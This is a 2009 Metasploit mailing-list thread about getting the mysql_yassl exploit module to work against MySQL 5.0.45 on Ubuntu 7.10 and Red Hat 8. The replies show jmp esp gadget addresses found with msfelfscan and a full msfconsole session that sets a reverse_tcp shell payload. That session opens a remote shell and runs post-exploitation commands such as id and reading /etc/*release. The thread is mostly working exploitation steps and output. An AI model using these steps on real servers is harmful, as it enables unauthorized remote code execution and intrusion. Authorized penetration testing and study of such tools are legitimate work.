exploit mysql_yassl unsuccesful

[mc at metasploit.com (MC)]

good to here.

i dont have a rh 8 target to test against. =(

~mc

On Mon, 30 Mar 2009, Lauri Kiiski wrote:

> Thanks. This worked.
>
> How about running against Red Hat 8 and MySQL 5.0.45 downloaded binary from 
> dev.mysql.com? I tried the same but this time it didn't work. I used 
> 0x08475cfb.
>
> $ ./msfelfscan mysqld -j esp | grep fb
> 0x083d0fbd push esp; ret
> 0x08475cfb jmp esp
> 0x084a22fb jmp esp
> 0x0874e4fb jmp esp
> 0x087829fb jmp esp
> 0x0874e4fb jmp esp
> 0x087829fb jmp esp
>
> MC wrote:
> > yeah, just adjust your ret and you should be good to go:
> >
> > $ ./msfelfscan /usr/sbin/mysqld -j esp | grep fb
> > 0x0837fbb8 push esp; ret
> > 0x0857dffb jmp esp
> > 0x0858fb7f jmp esp
> > 0x085fb710 push esp; retn 0x0000
> > 0x086c76fb jmp esp
> >
> > ///
> >
> > msf exploit(mysql_yassl) > set PAYLOAD linux/x86/shell/reverse_tcp
> > PAYLOAD => linux/x86/shell/reverse_tcp
> > msf exploit(mysql_yassl) > exploit
> >
> > [*] Handler binding to LHOST 0.0.0.0
> > [*] Started reverse handler
> > [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
> > [*] Sending stage (36 bytes)
> > [*] Command shell session 1 opened (192.168.0.188:1975 -> 
> > 192.168.0.149:45602)
> >
> > pwd
> > /var/lib/mysql
> > id
> > uid=109(mysql) gid=120(mysql) groups=120(mysql)
> > cat /etc/*release
> > DISTRIB_ID=Ubuntu
> > DISTRIB_RELEASE=7.10
> > DISTRIB_CODENAME=gutsy
> > DISTRIB_DESCRIPTION="Ubuntu 7.10"
> >
> > On Thu, 5 Mar 2009, MC wrote:
> >
> > > its been a minute since i've written that. but you may need to adjust the
> > > return for your target.
> > >
> > > On Fri, 6 Mar 2009, Lauri Kiiski wrote:
> > >
> > > > Hi
> > > >
> > > > I'm unable to get linux/mysql/mysql_yassl working. Is there something
> > > > basic what I'm missing here? The target is Ubuntu 7.10 without any
> > > > updates and MySQL 5.0.45-Debian_1ubuntu3-log. SSL is enabled in MySQL
> > > > and I can connect to it with SSL.
> > > >
> > > > My MySQL is different version. Is it a problem? I think I can't get
> > > > the exact version used in the exploit module since updates are newer.
> > > >
> > > > Here are the commands and output of the module. I tried with two
> > > > different payloads.
> > > >
> > > > use linux/mysql/mysql_yassl
> > > > set rhost target.ip
> > > > set payload linux/x86/shell/bind_tcp
> > > > set rhost target.ip
> > > >
> > > > msf exploit(mysql_yassl) > exploit
> > > >
> > > > [*] Started bind handler
> > > > [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
> > > > [*] Exploit completed, but no session was created.
> > > > msf exploit(mysql_yassl) >
> > > >
> > > >
> > > > set payload linux/x86/shell/reverse_tcp
> > > > set lhost msf.ip
> > > >
> > > > msf exploit(mysql_yassl) > exploit
> > > >
> > > > [*] Started reverse handler
> > > > [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
> > > > [*] Exploit completed, but no session was created.
> > > > msf exploit(mysql_yassl) >
> > > >
> > > > _______________________________________________
> > > > http://spool.metasploit.com/mailman/listinfo/framework